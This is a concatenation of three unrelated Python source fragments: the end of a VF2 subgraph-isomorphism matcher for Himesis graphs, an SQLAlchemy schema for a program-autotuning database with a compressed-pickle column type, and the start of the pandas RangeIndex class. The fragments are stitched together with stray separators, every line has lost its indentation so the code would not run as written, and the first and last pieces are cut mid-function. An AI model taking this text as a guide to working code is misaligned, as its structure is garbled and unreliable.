if self.succ2[successor2][1]:
out2 += 1
if not self.pred2[successor2][1] and not self.succ2[successor2][1]:
inout2 += 1
else:
if self.core_2[successor2] not in self.succ1[src_node][1]:
return False
# Checks if predecessors are compatible
for predecessor2 in self.pred2[patt_node][1]:
# tmp = self.G2.predecessors(predecessor2)
# self.pred2[predecessor2] = (len(tmp), tmp)
# tmp = self.G2.successors(predecessor2)
# self.succ2[predecessor2] = (len(tmp), tmp)
if predecessor2 not in self.core_2:
for predecessor1 in self.pred1[src_node][1]:
# tmp = self.G1.predecessors(predecessor1)
# self.pred1[predecessor1] = (len(tmp), tmp)
# tmp = self.G1.successors(predecessor1)
# self.succ1[predecessor1] = (len(tmp), tmp)
if (self.pred2[predecessor2][0] <= self.pred1[predecessor1][0]
and self.succ2[predecessor2][0] <= self.succ1[predecessor1][0]
and predecessor1 not in self.core_1):
break
else:
return False
# They are compatible, so update the counters of the pattern node
if self.pred2[predecessor2][1]:
in2 += 1
if self.succ2[predecessor2][1]:
out2 += 1
if not self.pred2[predecessor2][1] and not self.succ2[predecessor2][1]:
inout2 += 1
else:
if self.core_2[predecessor2] not in self.pred1[src_node][1]:
return False
# Now compute the counters of the source node
for successor1 in self.succ1[src_node][1]:
if successor1 not in self.core_1:
# tmp = self.G1.predecessors(successor1)
# self.pred1[successor1] = (len(tmp), tmp)
# tmp = self.G1.successors(successor1)
# self.succ1[successor1] = (len(tmp), tmp)
if self.pred1[successor1][1]:
in1 += 1
if self.succ1[successor1][1]:
out1 += 1
if not self.pred1[successor1][1] and not self.succ1[successor1][1]:
inout1 += 1
# For induced matches
#else:
# if self.core_1[successor1] not in self.succ2[patt_node]:
# return False
# Now compute the counters of the source node
for predecessor1 in self.pred1[src_node][1]:
if predecessor1 not in self.core_1:
# tmp = self.G1.predecessors(predecessor1)
# self.pred1[predecessor1] = (len(tmp), tmp)
# tmp = self.G1.successors(predecessor1)
# self.succ1[predecessor1] = (len(tmp), tmp)
if self.pred1[predecessor1][1]:
in1 += 1
if self.succ1[predecessor1][1]:
out1 += 1
if not self.pred1[predecessor1][1] and not self.succ1[predecessor1][1]:
inout1 += 1
# For induced matches
#else:
# if self.core_1[predecessor1] not in self.pred2[patt_node]:
# return False
# Finally, verify if all counters satisfy the subgraph matching conditions
# For induced matches
#return in2 <= in1 and out2 <= out1 and inout2 <= inout1
return in2 <= in1 and out2 <= out1 and (in2 + out2 + inout2) <= (in1 + out1 + inout1)
def are_semantically_feasible(self, src_node_num, patt_node_num):
"""
Determines whether the two nodes are syntactically feasible,
i.e., it ensures that adding this candidate pair does not make it impossible to find a total mapping.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
@return: True if they are semantically feasible, False otherwise.
"""
#=======================================================================
# This feasibility check looks at the data stored in the pair of candidates.
# It verifies that all attribute constraints are satisfied.
#=======================================================================
src_node = self.G1.vs[src_node_num]
patt_node = self.G2.vs[patt_node_num]
# print("\n")
# print("Src node: " + str(src_node_num))
# print("Src constant: " + str(self.src_eqs_constant))
# print("Patt node: " + str(patt_node_num))
# print("Patt constant: " + str(self.patt_eqs_constant))
src_equations = []
if src_node_num in self.src_eqs_constant:
src_equations = self.src_eqs_constant[src_node_num]
if patt_node_num in self.patt_eqs_constant:
patt_equations = self.patt_eqs_constant[patt_node_num]
#print("Source Eq: " + str(src_equation))
#print("Pattern Eq: " + str(patt_equations))
for patt_eq in patt_equations:
patt_attr = patt_eq[0]
patt_value = patt_eq[1]
found = False
for (src_attr, src_value) in src_equations:
if patt_attr == src_attr:
if patt_value == src_value:
found = True
break
else:
#print("Equations do not match")
return False
if found:
continue
try:
if src_node[patt_attr] != patt_value:
#print("Couldn't find value, found " + str(src_node[patt_attr]))
#print("Patt eq: " + str(patt_eq))
return False
except KeyError:
#print("Couldn't find " + patt_attr + " on node " + src_node["mm__"])
#the attribute does not exist on the node
return False
# Check for attributes value/constraint
for attr in patt_node.attribute_names():
# Attribute constraints are stored as attributes in the pattern node.
# The attribute must be prefixed by a specific keyword
if not attr.startswith("MT_pre__"):
continue
# If the attribute does not "in theory" exist
# because igraph actually stores all attribute names in all nodes.
elif patt_node[attr] is None:
continue
if patt_node[attr] == get_default_match_code():
continue
attr_name = attr[8:]
#methName = self.G2.get_attr_constraint_name(patt_node.index, attr)
methName = 'eval_%s%s' % (attr_name, patt_node['MT_label__'])
checkConstraint = getattr(self.G2, methName, None)
# The following assumes that every attribute constraint is defined on the pattern graph
# (and not on the pattern node itself)
#if callable(checkConstraint):
try:
# This is equivalent to: if not eval_attrLbl(attr_value, currNode)
if not checkConstraint(src_node[attr_name], src_node):
return False
except Exception as e:
#TODO: This should be a TransformationLanguageSpecificException
print("Source graph: " + self.G1.name)
print("Pattern graph: " + self.G2.name)
for n in self.G1.vs:
try:
print("Type: " + n["type"])
print("MM: " + n["mm__"])
except KeyError:
pass
raise Exception("An error has occurred while checking the constraint of the attribute '" + attr_name + "'"
+ " in node '" + src_node["mm__"] + "' in graph: '" + self.G1.name + "'", e)
#assume the method is callable
#else:
# raise Exception('The method %s was not found in the pattern graph' % methName)
return True
#@profile
def _match(self):
"""
Extends the pattern matching mapping.
This method is recursively called to determine if the pattern G2
can be completely matched on G1.
@return: The mapping {pattern node index : source node index}
"""
#=======================================================================
# It cleans up the class variables after each recursive call.
# If a match is found, we yield the mapping.
#=======================================================================
# Base condition when a complete match is found
if len(self.core_2) == self.G2_vcount:
# Save the final mapping, otherwise garbage collection deletes it
self.mapping = self.core_2.copy()
yield self.mapping
else:
for src_node, patt_node in self.candidate_pairs_iter():
# Cache the predecessors and successors of the candidate pairs on the fly
# self.pred1, self.succ1, self.pred2, self.succ2 = {}, {}, {}, {}
# self.pred1[src_node] = (len(self.G1.predecessors(src_node)), self.G1.predecessors(src_node))
# self.succ1[src_node] = (len(self.G1.successors(src_node)), self.G1.successors(src_node))
# self.pred2[patt_node] = (len(self.G2.predecessors(patt_node)), self.G2.predecessors(patt_node))
# self.succ2[patt_node] = (len(self.G2.successors(patt_node)), self.G2.successors(patt_node))
# Check for the degree compatibility
if not (self.pred2[patt_node][0] <= self.pred1[src_node][0]
and self.succ2[patt_node][0] <= self.succ1[src_node][0]):
continue
sourceMM = self.mm1[src_node]
targetMM = self.mm2[patt_node]
if sourceMM != targetMM:
if not self.src_has_supertype[src_node] or targetMM not in self.superclasses_dict[sourceMM]:
continue
#if self.are_compatibile(src_node, patt_node):
if self.are_syntactically_feasible(src_node, patt_node):
if self.are_semantically_feasible(src_node, patt_node):
# Recursive call, adding the feasible state
newstate = self.save(src_node, patt_node)
#newstate = HimesisMatcherState(self, src_node, patt_node)
for mapping in self._match():
yield mapping
# restore data structures
self.restore(newstate)
#newstate.restore()
def has_match(self, context={}):
"""
Determines if the pattern graph can be matched on the source graph.
@param context: Optional predefined mapping {pattern node index: source node index}.
@return: True if a match is found, False otherwise.
"""
try:
next(self.match_iter(context))
return True
except StopIteration:
return False
def match_iter(self, context={}):
"""
Iterator over matchings of the pattern graph on the source graph.
@param context: Optional predefined mapping {pattern node index: source node index}.
@return: The mapping {pattern node index : source node index}.
"""
self.initialize()
for p in context:
if self.are_semantically_feasible(context[p], p):
self.save(context[p], p)
else:
# Additional constraints on the pivot nodes are not satisfied: no match is possible
return
for mapping in self._match():
yield mapping
def save(self, src_node=None, patt_node=None):
"""
Internal representation of state for the HimesisMatcher class.
@param matcher: The HimesisMatcher object.
@param src_node: The source node of the candidate pair.
@param src_node: The pattern node of the candidate pair.
"""
# Initialize the last stored node pair.
saved_src_node = None
saved_patt_node = None
depth = 0
if src_node is None or patt_node is None:
# Then we reset the class variables
self.core_1 = {}
self.core_2 = {}
self.in_1 = {}
self.in_2 = {}
self.out_1 = {}
self.out_2 = {}
self.inout_1 = {}
self.inout_2 = {}
# Watch out! src_node == 0 should evaluate to True.
if src_node is not None and patt_node is not None:
# Add the node pair to the isomorphism mapping.
self.core_1[src_node] = patt_node
self.core_2[patt_node] = src_node
# Store the node that was added last.
saved_src_node = src_node
saved_patt_node = patt_node
# Now we must update the other four vectors.
# We will add only if it is not in there already!
depth = len(self.core_1)
# First we add the new nodes...
for vector in (self.in_1, self.out_1, self.inout_1):
if src_node not in vector:
vector[src_node] = depth
for vector in (self.in_2, self.out_2, self.inout_2):
if patt_node not in vector:
vector[patt_node] = depth
# Now we add every other node...
# Updates for T_1^{in}
new_nodes_in = []
# Updates for T_1^{out}
new_nodes_out = []
for node in self.core_1:
new_nodes_in += self.pred1[node][1]
new_nodes_out += self.succ1[node][1]
for node in set(new_nodes_in):
if node not in self.in_1 and node not in self.core_1:
self.in_1[node] = depth
for node in set(new_nodes_out):
if node not in self.out_1 and node not in self.core_1:
self.out_1[node] = depth
# Updates for T_1^{inout}
# & returns the intersection
for node in set(self.in_1.keys()).intersection(set(self.out_1.keys())):
if node not in self.inout_1:
self.inout_1[node] = depth
# Updates for T_2^{in}
new_nodes_in = []
# Updates for T_2^{out}
new_nodes_out = []
for node in self.core_2:
new_nodes_in += self.pred2[node][1]
new_nodes_out += self.succ2[node][1]
for node in set(new_nodes_in):
if node not in self.in_2 and node not in self.core_2:
self.in_2[node] = depth
for node in set(new_nodes_out):
if node not in self.out_2 and node not in self.core_2:
self.out_2[node] = depth
# Updates for T_2^{inout}
# & returns the intersection
for node in set(self.in_2.keys()).intersection(set(self.out_2.keys())):
if node not in self.inout_2:
self.inout_2[node] = depth
return (saved_src_node, saved_patt_node, depth)
def restore(self, state):
"""
Deletes the HimesisMatcherState object and restores the class variables.
"""
saved_src_node, saved_patt_node, depth = state
# First we remove the node that was added from the core vectors.
# Watch out! src_node == 0 should evaluate to True.
if saved_src_node is not None and saved_patt_node is not None:
del self.core_1[saved_src_node]
del self.core_2[saved_patt_node]
# Now we revert the other four vectors.
# Thus, we delete all entries which have this depth level.
for vector in (self.in_1, self.in_2, self.out_1, self.out_2, self.inout_1, self.inout_2):
vector_keys = list(vector.keys())
for node in vector_keys:
if vector[node] == depth:
del vector[node]
class HimesisMatcherState(object):
"""
Internal representation of state for the HimesisMatcher class.
This class is used internally by the HimesisMatcher class. It is used
only to store state specific data. There will be at most V(pattern graph) of
these objects in memory at a time, due to the depth-first search
strategy employed by the VF2 algorithm.
"""
def __init__(self, matcher, src_node=None, patt_node=None):
"""
Internal representation of state for the HimesisMatcher class.
@param matcher: The HimesisMatcher object.
@param src_node: The source node of the candidate pair.
@param patt_node: The pattern node of the candidate pair.
"""
self.matcher = matcher
# Initialize the last stored node pair.
self.src_node = None
self.patt_node = None
self.depth = len(matcher.core_1)
if src_node is None or patt_node is None:
# Then we reset the class variables
matcher.core_1 = {}
matcher.core_2 = {}
matcher.in_1 = {}
matcher.in_2 = {}
matcher.out_1 = {}
matcher.out_2 = {}
matcher.inout_1 = {}
matcher.inout_2 = {}
# Watch out! src_node == 0 should evaluate to True.
if src_node is not None and patt_node is not None:
# Add the node pair to the isomorphism mapping.
matcher.core_1[src_node] = patt_node
matcher.core_2[patt_node] = src_node
# Store the node that was added last.
self.src_node = src_node
self.patt_node = patt_node
# Now we must update the other four vectors.
# We will add only if it is not in there already!
self.depth = len(matcher.core_1)
# First we add the new nodes...
for vector in (matcher.in_1, matcher.out_1, matcher.inout_1):
if src_node not in vector:
vector[src_node] = self.depth
for vector in (matcher.in_2, matcher.out_2, matcher.inout_2):
if patt_node not in vector:
vector[patt_node] = self.depth
# Now we add every other node...
# Updates for T_1^{in}
new_nodes_in = []
# Updates for T_1^{out}
new_nodes_out = []
for node in matcher.core_1:
new_nodes_in += matcher.pred1[node][1]
new_nodes_out += matcher.succ1[node][1]
for node in set(new_nodes_in):
if node not in matcher.in_1 and node not in matcher.core_1:
matcher.in_1[node] = self.depth
for node in set(new_nodes_out):
if node not in matcher.out_1 and node not in matcher.core_1:
matcher.out_1[node] = self.depth
# Updates for T_1^{inout}
# & returns the intersection
for node in set(matcher.in_1.keys()).intersection(set(matcher.out_1.keys())):
if node not in matcher.inout_1:
matcher.inout_1[node] = self.depth
# Updates for T_2^{in}
new_nodes_in = []
# Updates for T_2^{out}
new_nodes_out = []
for node in matcher.core_2:
new_nodes_in += matcher.pred2[node][1]
new_nodes_out += matcher.succ2[node][1]
for node in set(new_nodes_in):
if node not in matcher.in_2 and node not in matcher.core_2:
matcher.in_2[node] = self.depth
for node in set(new_nodes_out):
if node not in matcher.out_2 and node not in matcher.core_2:
matcher.out_2[node] = self.depth
# Updates for T_2^{inout}
# & returns the intersection
for node in set(matcher.in_2.keys()).intersection(set(matcher.out_2.keys())):
if node not in matcher.inout_2:
matcher.inout_2[node] = self.depth
def restore(self):
"""
Deletes the HimesisMatcherState object and restores the class variables.
"""
# First we remove the node that was added from the core vectors.
# Watch out! src_node == 0 should evaluate to True.
if self.src_node is not None and self.patt_node is not None:
del self.matcher.core_1[self.src_node]
del self.matcher.core_2[self.patt_node]
# Now we revert the other four vectors.
# Thus, we delete all entries which have this depth level.
for vector in (self.matcher.in_1, self.matcher.in_2, self.matcher.out_1, self.matcher.out_2, self.matcher.inout_1, self.matcher.inout_2):
vector_keys = list(vector.keys())
for node in vector_keys:
if vector[node] == self.depth:
del vector[node]
class VF2(HimesisMatcher):
"""
The native VF2 algorithm for subgraph isomorphism.
"""
def __init__(self, G1, G2):
"""
The native VF2 algorithm for subgraph isomorphism.
@param G1: The bigger graph.
@param G2: The smaller graph.
"""
HimesisMatcher.__init__(self, G1, G2)
def match_iter(self):
"""
Iterator over mappings of G2 on a subgraph of G1.
@return: The mapping {pattern node uuid : source node uuid}.
"""
for mapping in self.G1.get_subisomorphisms_vf2(self.G2):
# mapping is a list for which mapping[i] is the source node index mapped to the pattern node index i
# So we need to convert it into a dictionary
match = {}
for pattern_node, src_node in enumerate(mapping):
match[pattern_node] = src_node
yield match
class SubgraphIsoMatcher(HimesisMatcher):
"""
The VF2 algorithm for subgraph isomorphism as implemented in HimesisMatcher.
Basically this is the same as HimesisMatcher but no node data is taken into consideration.
"""
def __init__(self, source_graph, pattern_graph, priority=Priority()):
"""
The VF2 algorithm for subgraph isomorphism as implemented in HimesisMatcher.
Basically this is the same as HimesisMatcher but no node data is taken into consideration.
"""
# the priority mechanism was removed from HimesisMatcher, so it is no longer forwarded
HimesisMatcher.__init__(self, source_graph, pattern_graph)
def are_compatibile(self, src_node, patt_node):
"""
Verifies if a candidate pair is compatible.
More specifically, verify degree compatibility.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
"""
return (self.pred2[patt_node][0] <= self.pred1[src_node][0]
and self.succ2[patt_node][0] <= self.succ1[src_node][0])
def are_semantically_feasible(self, sourceNode, patternNode):
"""
Since no data is considered, the graphs have no semantics.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
@return: True always.
"""
return True
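# ---------------------------------------------------------------------------
# Hedged usage sketch (illustrative only, not part of the original module).
# It assumes "source" and "pattern" are Himesis graphs built elsewhere with
# the attributes this module relies on ("mm__" and "MT_label__" vertex
# attributes, plus an "equations" graph attribute):
#
#     matcher = HimesisMatcher(source, pattern)
#     try:
#         for mapping in matcher.match_iter():
#             print(mapping)  # {pattern node index: source node index}
#     finally:
#         matcher.reset_recursion_limit()
# ---------------------------------------------------------------------------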
|
|
from future import standard_library
standard_library.install_aliases()
from builtins import object
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy import create_engine
from sqlalchemy.orm import relationship
from sqlalchemy import (
Column, Integer, String, DateTime, Boolean, Enum,
Float, PickleType, ForeignKey, Text, func, Index)
import sqlalchemy
import re
from pickle import dumps, loads
import zlib
class CompressedPickler(object):
@classmethod
def dumps(cls, obj, protocol=2):
s = dumps(obj, protocol)
sz = zlib.compress(s, 9)
if len(sz) < len(s):
return sz
else:
return s
@classmethod
def loads(cls, string):
try:
s = zlib.decompress(string)
except zlib.error:
# the stored value was not compressed (dumps() keeps the raw pickle when it is smaller)
s = string
return loads(s)
class Base(object):
@declared_attr
def __tablename__(cls):
"""convert camel case to underscores"""
return re.sub(r'([a-z])([A-Z])', r'\1_\2', cls.__name__).lower()
id = Column(Integer, primary_key=True, index=True)
Base = declarative_base(cls=Base)
class _Meta(Base):
""" meta table to track current version """
db_version = Column(String(128))
@classmethod
def has_version(cls, session, version):
try:
session.flush()
session.query(_Meta).filter_by(db_version=version).one()
return True
except sqlalchemy.orm.exc.NoResultFound:
return False
@classmethod
def get_version(cls, session):
try:
session.flush()
x = session.query(_Meta).one()
return x.db_version
except sqlalchemy.orm.exc.NoResultFound:
return None
@classmethod
def add_version(cls, session, version):
if not cls.has_version(session, version):
session.add(_Meta(db_version=version))
class Program(Base):
project = Column(String(128))
name = Column(String(128))
@classmethod
def get(cls, session, project, name):
try:
session.flush()
return session.query(Program).filter_by(project=project, name=name).one()
except sqlalchemy.orm.exc.NoResultFound:
t = Program(project=project, name=name)
session.add(t)
return t
class ProgramVersion(Base):
program_id = Column(ForeignKey(Program.id))
program = relationship(Program, backref='versions')
version = Column(String(128))
parameter_info = Column(Text)
@property
def name(self):
return self.program.name
@property
def project(self):
return self.program.project
@classmethod
def get(cls, session, project, name, version, parameter_info=None):
program = Program.get(session, project, name)
try:
session.flush()
if parameter_info is None:
return session.query(ProgramVersion).filter_by(program=program,
version=version).one()
else:
return session.query(ProgramVersion).filter_by(program=program,
version=version,
parameter_info=parameter_info).one()
except sqlalchemy.orm.exc.NoResultFound:
t = ProgramVersion(program=program, version=version, parameter_info=parameter_info)
session.add(t)
return t
class Configuration(Base):
program_id = Column(ForeignKey(Program.id))
program = relationship(Program)
hash = Column(String(64))
data = Column(PickleType(pickler=CompressedPickler))
@classmethod
def get(cls, session, program, hashv, datav):
try:
session.flush()
return (session.query(Configuration)
.filter_by(program=program, hash=hashv).one())
except sqlalchemy.orm.exc.NoResultFound:
t = Configuration(program=program, hash=hashv, data=datav)
session.add(t)
return t
Index('ix_configuration_custom1', Configuration.program_id, Configuration.hash)
class MachineClass(Base):
name = Column(String(128))
@classmethod
def get(cls, session, name):
try:
session.flush()
return session.query(MachineClass).filter_by(name=name).one()
except sqlalchemy.orm.exc.NoResultFound:
t = MachineClass(name=name)
session.add(t)
return t
class Machine(Base):
name = Column(String(128))
cpu = Column(String(128))
cores = Column(Integer)
memory_gb = Column(Float)
machine_class_id = Column(ForeignKey(MachineClass.id))
machine_class = relationship(MachineClass, backref='machines')
class InputClass(Base):
program_id = Column(ForeignKey(Program.id))
program = relationship(Program, backref='inputs')
name = Column(String(128))
size = Column(Integer)
@classmethod
def get(cls, session, program, name='default', size=-1):
try:
session.flush()
return session.query(InputClass).filter_by(program=program,
name=name,
size=size).one()
except sqlalchemy.orm.exc.NoResultFound:
t = InputClass(program=program, name=name, size=size)
session.add(t)
return t
class Input(Base):
# state = Column(Enum('ANY_MACHINE', 'SINGLE_MACHINE', 'DELETED'),
# default='ANY_MACHINE', name='t_input_state')
input_class_id = Column(ForeignKey(InputClass.id))
input_class = relationship(InputClass, backref='inputs')
# optional, set only for state='SINGLE_MACHINE'
# machine_id = Column(ForeignKey(MachineClass.id))
# machine = relationship(MachineClass, backref='inputs')
# optional, for use by InputManager
path = Column(Text)
extra = Column(PickleType(pickler=CompressedPickler))
class TuningRun(Base):
uuid = Column(String(32), index=True, unique=True)
program_version_id = Column(ForeignKey(ProgramVersion.id))
program_version = relationship(ProgramVersion, backref='tuning_runs')
machine_class_id = Column(ForeignKey(MachineClass.id))
machine_class = relationship(MachineClass, backref='tuning_runs')
input_class_id = Column(ForeignKey(InputClass.id))
input_class = relationship(InputClass, backref='tuning_runs')
name = Column(String(128), default='unnamed')
args = Column(PickleType(pickler=CompressedPickler))
objective = Column(PickleType(pickler=CompressedPickler))
state = Column(Enum('QUEUED', 'RUNNING', 'COMPLETE', 'ABORTED',
name='t_tr_state'),
default='QUEUED')
start_date = Column(DateTime, default=func.now())
end_date = Column(DateTime)
final_config_id = Column(ForeignKey(Configuration.id))
final_config = relationship(Configuration)
# __mapper_args__ = {'primary_key': uuid}
@property
def program(self):
return self.program_version.program
class Result(Base):
# set by MeasurementDriver:
configuration_id = Column(ForeignKey(Configuration.id))
configuration = relationship(Configuration)
machine_id = Column(ForeignKey(Machine.id))
machine = relationship(Machine, backref='results')
input_id = Column(ForeignKey(Input.id))
input = relationship(Input, backref='results')
tuning_run_id = Column(ForeignKey(TuningRun.id), index=True)
tuning_run = relationship(TuningRun, backref='results')
collection_date = Column(DateTime, default=func.now())
collection_cost = Column(Float)
# set by MeasurementInterface:
state = Column(Enum('OK', 'TIMEOUT', 'ERROR',
name='t_result_state'),
default='OK')
time = Column(Float)
accuracy = Column(Float)
energy = Column(Float)
size = Column(Float)
confidence = Column(Float)
# extra = Column(PickleType)
# set by SearchDriver
was_new_best = Column(Boolean)
Index('ix_result_custom1', Result.tuning_run_id, Result.was_new_best)
class DesiredResult(Base):
# set by the technique:
configuration_id = Column(ForeignKey(Configuration.id))
configuration = relationship(Configuration)
limit = Column(Float)
# set by the search driver
priority = Column(Float)
tuning_run_id = Column(ForeignKey(TuningRun.id))
tuning_run = relationship(TuningRun, backref='desired_results')
generation = Column(Integer)
requestor = Column(String(128))
request_date = Column(DateTime, default=func.now())
# set by the measurement driver
state = Column(Enum('UNKNOWN', 'REQUESTED', 'RUNNING',
'COMPLETE', 'ABORTED',
name="t_dr_state"),
default='UNKNOWN')
result_id = Column(ForeignKey(Result.id), index=True)
result = relationship(Result, backref='desired_results')
start_date = Column(DateTime)
# input_id = Column(ForeignKey(Input.id))
# input = relationship(Input, backref='desired_results')
Index('ix_desired_result_custom1', DesiredResult.tuning_run_id,
DesiredResult.generation)
Index('ix_desired_result_custom2', DesiredResult.tuning_run_id,
DesiredResult.configuration_id)
# track bandit meta-technique information if a bandit meta-technique is used for a tuning run.
class BanditInfo(Base):
tuning_run_id = Column(ForeignKey(TuningRun.id))
tuning_run = relationship(TuningRun, backref='bandit_info')
# the bandit exploration/exploitation tradeoff
c = Column(Float)
# the bandit window
window = Column(Integer)
class BanditSubTechnique(Base):
bandit_info_id = Column(ForeignKey(BanditInfo.id))
bandit_info = relationship(BanditInfo, backref='subtechniques')
name = Column(String(128))
if __name__ == '__main__':
# test:
engine = create_engine('sqlite:///:memory:', echo=True)
Base.metadata.create_all(engine)
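# Hedged extension of the smoke test above (names are illustrative only):
# exercise the get() helpers and the CompressedPickler round trip.
from sqlalchemy.orm import sessionmaker
session = sessionmaker(bind=engine)()
prog = Program.get(session, 'demo_project', 'demo_program')
pv = ProgramVersion.get(session, 'demo_project', 'demo_program', '1.0')
session.commit()
print(prog.name, pv.version)
payload = {'flags': ['-O2'] * 100}
assert CompressedPickler.loads(CompressedPickler.dumps(payload)) == payload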
|
|
from __future__ import annotations
from datetime import timedelta
import operator
from sys import getsizeof
from typing import (
TYPE_CHECKING,
Any,
Callable,
Hashable,
List,
cast,
)
import warnings
import numpy as np
from pandas._libs import (
index as libindex,
lib,
)
from pandas._libs.lib import no_default
from pandas._typing import (
Dtype,
npt,
)
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.common import (
ensure_platform_int,
ensure_python_int,
is_float,
is_integer,
is_scalar,
is_signed_integer_dtype,
is_timedelta64_dtype,
)
from pandas.core.dtypes.generic import ABCTimedeltaIndex
from pandas.core import ops
import pandas.core.common as com
from pandas.core.construction import extract_array
import pandas.core.indexes.base as ibase
from pandas.core.indexes.base import maybe_extract_name
from pandas.core.indexes.numeric import (
Float64Index,
Int64Index,
NumericIndex,
)
from pandas.core.ops.common import unpack_zerodim_and_defer
if TYPE_CHECKING:
from pandas import Index
_empty_range = range(0)
class RangeIndex(NumericIndex):
"""
Immutable Index implementing a monotonic integer range.
RangeIndex is a memory-saving special case of Int64Index limited to
representing monotonic ranges. Using RangeIndex may in some instances
improve computing speed.
This is the default index type used
by DataFrame and Series when no explicit index is provided by the user.
Parameters
----------
start : int (default: 0), range, or other RangeIndex instance
If int and "stop" is not given, interpreted as "stop" instead.
stop : int (default: 0)
step : int (default: 1)
dtype : np.int64
Unused, accepted for homogeneity with other index types.
copy : bool, default False
Unused, accepted for homogeneity with other index types.
name : object, optional
Name to be stored in the index.
Attributes
----------
start
stop
step
Methods
-------
from_range
See Also
--------
Index : The base pandas Index type.
Int64Index : Index of int64 data.
"""
_typ = "rangeindex"
_engine_type = libindex.Int64Engine
_dtype_validation_metadata = (is_signed_integer_dtype, "signed integer")
_range: range
_is_backward_compat_public_numeric_index: bool = False
# --------------------------------------------------------------------
# Constructors
def __new__(
cls,
start=None,
stop=None,
step=None,
dtype: Dtype | None = None,
copy: bool = False,
name: Hashable = None,
) -> RangeIndex:
cls._validate_dtype(dtype)
name = maybe_extract_name(name, start, cls)
# RangeIndex
if isinstance(start, RangeIndex):
return start.copy(name=name)
elif isinstance(start, range):
return cls._simple_new(start, name=name)
# validate the arguments
if com.all_none(start, stop, step):
raise TypeError("RangeIndex(...) must be called with integers")
start = ensure_python_int(start) if start is not None else 0
if stop is None:
start, stop = 0, start
else:
stop = ensure_python_int(stop)
step = ensure_python_int(step) if step is not None else 1
if step == 0:
raise ValueError("Step must not be zero")
rng = range(start, stop, step)
return cls._simple_new(rng, name=name)
@classmethod
def from_range(
cls, data: range, name=None, dtype: Dtype | None = None
) -> RangeIndex:
"""
Create RangeIndex from a range object.
Returns
-------
RangeIndex
"""
if not isinstance(data, range):
raise TypeError(
f"{cls.__name__}(...) must be called with object coercible to a "
f"range, {repr(data)} was passed"
)
cls._validate_dtype(dtype)
return cls._simple_new(data, name=name)
@classmethod
def _simple_new(cls, values: range, name: Hashable = None) -> RangeIndex:
result = object.__new__(cls)
assert isinstance(values, range)
result._range = values
result._name = name
result._cache = {}
result._reset_identity()
return result
# --------------------------------------------------------------------
# error: Return type "Type[Int64Index]" of "_constructor" incompatible with return
# type "Type[RangeIndex]" in supertype "Index"
@cache_readonly
def _constructor(self) -> type[Int64Index]: # type: ignore[override]
"""return the class to use for construction"""
return Int64Index
# error: Signature of "_data" incompatible with supertype "Index"
@cache_readonly
def _data(self) -> np.ndarray: # type: ignore[override]
"""
An int array that for performance reasons is created only when needed.
The constructed array is saved in ``_cache``.
"""
return np.arange(self.start, self.stop, self.step, dtype=np.int64)
def _get_data_as_items(self):
"""return a list of tuples of start, stop, step"""
rng = self._range
return [("start", rng.start), ("stop", rng.stop), ("step", rng.step)]
def __reduce__(self):
d = {"name": self.name}
d.update(dict(self._get_data_as_items()))
return ibase._new_Index, (type(self), d), None
# --------------------------------------------------------------------
# Rendering Methods
def _format_attrs(self):
"""
Return a list of tuples of the (attr, formatted_value)
"""
attrs = self._get_data_as_items()
if self.name is not None:
attrs.append(("name", ibase.default_pprint(self.name)))
return attrs
def _format_data(self, name=None):
# we are formatting thru the attributes
return None
def _format_with_header(self, header: list[str], na_rep: str) -> list[str]:
# Equivalent to Index implementation, but faster
if not len(self._range):
return header
first_val_str = str(self._range[0])
last_val_str = str(self._range[-1])
max_length = max(len(first_val_str), len(last_val_str))
return header + [f"{x:<{max_length}}" for x in self._range]
# --------------------------------------------------------------------
_deprecation_message = (
"RangeIndex.{} is deprecated and will be "
"removed in a future version. Use RangeIndex.{} "
"instead"
)
@property
def start(self) -> int:
"""
The value of the `start` parameter (``0`` if this was not supplied).
"""
# GH 25710
return self._range.start
@property
def _start(self) -> int:
"""
The value of the `start` parameter (``0`` if this was not supplied).
.. deprecated:: 0.25.0
Use ``start`` instead.
"""
warnings.warn(
self._deprecation_message.format("_start", "start"),
FutureWarning,
stacklevel=2,
)
return self.start
@property
def stop(self) -> int:
"""
The value of the `stop` parameter.
"""
return self._range.stop
@property
def _stop(self) -> int:
"""
The value of the `stop` parameter.
.. deprecated:: 0.25.0
Use ``stop`` instead.
"""
# GH 25710
warnings.warn(
self._deprecation_message.format("_stop", "stop"),
FutureWarning,
stacklevel=2,
)
return self.stop
@property
def step(self) -> int:
"""
The value of the `step` parameter (``1`` if this was not supplied).
"""
# GH 25710
return self._range.step
@property
def _step(self) -> int:
"""
The value of the `step` parameter (``1`` if this was not supplied).
.. deprecated:: 0.25.0
Use ``step`` instead.
"""
# GH 25710
warnings.warn(
self._deprecation_message.format("_step", "step"),
FutureWarning,
stacklevel=2,
)
return self.step
@cache_readonly
def nbytes(self) -> int:
"""
Return the number of bytes in the underlying data.
"""
rng = self._range
return getsizeof(rng) + sum(
getsizeof(getattr(rng, attr_name))
for attr_name in ["start", "stop", "step"]
)
def memory_usage(self, deep: bool = False) -> int:
"""
Memory usage of my values
Parameters
----------
deep : bool
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption
Returns
-------
bytes used
Notes
-----
Memory usage does not include memory consumed by elements that
are not components of the array if deep=False
See Also
--------
numpy.ndarray.nbytes
"""
return self.nbytes
@property
def dtype(self) -> np.dtype:
return np.dtype(np.int64)
@property
def is_unique(self) -> bool:
"""return if the index has unique values"""
return True
@cache_readonly
def is_monotonic_increasing(self) -> bool:
return self._range.step > 0 or len(self) <= 1
@cache_readonly
def is_monotonic_decreasing(self) -> bool:
return self._range.step < 0 or len(self) <= 1
def __contains__(self, key: Any) -> bool:
hash(key)
try:
key = ensure_python_int(key)
except TypeError:
return False
return key in self._range
@property
def inferred_type(self) -> str:
return "integer"
# --------------------------------------------------------------------
# Indexing Methods
@doc(Int64Index.get_loc)
def get_loc(self, key, method=None, tolerance=None):
if method is None and tolerance is None:
if is_integer(key) or (is_float(key) and key.is_integer()):
new_key = int(key)
try:
return self._range.index(new_key)
except ValueError as err:
raise KeyError(key) from err
self._check_indexing_error(key)
raise KeyError(key)
return super().get_loc(key, method=method, tolerance=tolerance)
def _get_indexer(
self,
target: Index,
method: str | None = None,
limit: int | None = None,
tolerance=None,
